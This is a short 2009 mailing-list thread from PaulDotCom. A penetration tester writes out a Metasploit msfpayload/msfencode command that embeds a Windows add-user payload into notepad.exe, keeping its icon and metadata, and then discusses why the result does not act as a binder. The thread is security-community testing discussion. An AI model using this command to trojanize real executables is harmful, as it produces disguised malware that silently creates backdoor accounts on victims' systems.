PaulDotCom mailing list archives

Manually embedding shellcode into executables


From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Tue, 1 Dec 2009 17:17:23 -0500

Ok, I just read Rob's post here:
http://www.room362.com/blog/2009/11/3/metasploit-blends-in-new-msfpayloadencode.html

and checked my exes. Since both are the same size, I'm guessing it's not
working as a binder but as a "cloaker" of sorts.

Adrian

On Tue, Dec 1, 2009 at 5:12 PM, Adrian Crenshaw <irongeek at irongeek.com> wrote:

Ok, I did this:

$ msfpayload windows/adduser user=test pass=test exitfunc=seh R | msfencode -t exe -x notepad.exe -o MYNEWFILE.exe

The exe made has the same icon and metadata as the original. The payload
runs since the "test" account is created, but notepad never comes up, so it
does not make much of a binder. Any ideas?

Adrian
